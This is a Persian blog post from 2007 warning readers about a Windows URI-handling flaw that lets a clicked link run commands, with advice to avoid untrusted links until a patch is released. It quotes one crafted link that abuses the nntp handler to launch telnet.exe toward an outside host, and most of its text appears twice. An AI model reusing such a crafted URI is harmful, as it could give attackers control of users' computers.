با انتشار باگ جدید ویندوز باید بیشتر در بازدید از سایتها دقت نماید
باگ کشف شده ی جدید در ویندوز امکان اجرای دستورات و کدهای دلخواه در سیستم های آسیب پذیر را براحتی برای نفوذگران فراهم مینماید.
آسیب ناشی از عدم توانایی بررسی صحیح URI ها توسط ویندوز بوده که براحتی با بازدید کاربر از یک لینک امکان اجرای فایلها و فرمانهای مختلف را از روی سیستم کاربر به نفوذگر میدهد.
ویندوز قابلیت کنترل برخی از URIهای پیش فرض و پر استفاده مانند mailto و telnet را ندارد این کار اجازه استفاده از آنها را بشکل غیر معمول میدهد. بطور مثال کافیست شما بر روی لینکی شبیه به nntp:../../../../../Windows/system32/telnet.exe" "bugtraq 80%.bat کلیک نمایید تا یک اتصال از سیستم شما به سایت باگ تراک (سیستم نفوذگر) برقرار شده و او دسترسی کاملی به سیستم شما بدست آورد.
در حال حاضر کاربرانی که از فایرفاکس نسخه 2.0.0.5 و حتی نسخه 3.0بتا و یا Netscape نسخه 9 استفاده مینمایند، در صورتی که در سیستم آنها اینترنت اکسپلورر نسخه 7 نصب باشد در معرض خطر قرار دارند.
این باگ در ویندوز XP سرویس پک 2 و ویندوز 2003 سرویس پک 2 آزمایش شده است.
در حال حاضر نیز هیچ بسته بروزرسانی امنیتی برای این باگ منتشر نشده است.رسانه امنیت دیجیتال توصیه می کند تا انتشار بروزرسان امنیتی از بازدید سایتها و لینکهای نامطمئن بپرهیزید.
آسیب ناشی از عدم توانایی بررسی صحیح URI ها توسط ویندوز بوده که براحتی با بازدید کاربر از یک لینک امکان اجرای فایلها و فرمانهای مختلف را از روی سیستم کاربر به نفوذگر میدهد.
ویندوز قابلیت کنترل برخی از URIهای پیش فرض و پر استفاده مانند mailto و telnet را ندارد این کار اجازه استفاده از آنها را بشکل غیر معمول میدهد. بطور مثال کافیست شما بر روی لینکی شبیه به nntp:../../../../../Windows/system32/telnet.exe" "bugtraq 80%.bat کلیک نمایید تا یک اتصال از سیستم شما به سایت باگ تراک (سیستم نفوذگر) برقرار شده و او دسترسی کاملی به سیستم شما بدست آورد.
در حال حاضر کاربرانی که از فایرفاکس نسخه 2.0.0.5 و حتی نسخه 3.0بتا و یا Netscape نسخه 9 استفاده مینمایند، در صورتی که در سیستم آنها اینترنت اکسپلورر نسخه 7 نصب باشد در معرض خطر قرار دارند.
این باگ در ویندوز XP سرویس پک 2 و ویندوز 2003 سرویس پک 2 آزمایش شده است.
در حال حاضر نیز هیچ بسته بروزرسانی امنیتی برای این باگ منتشر نشده است.رسانه امنیت دیجیتال توصیه می کند تا انتشار بروزرسان امنیتی از بازدید سایتها و لینکهای نامطمئن بپرهیزید.
+ نوشته شده در جمعه پنجم مرداد ۱۳۸۶ ساعت توسط babak mahjub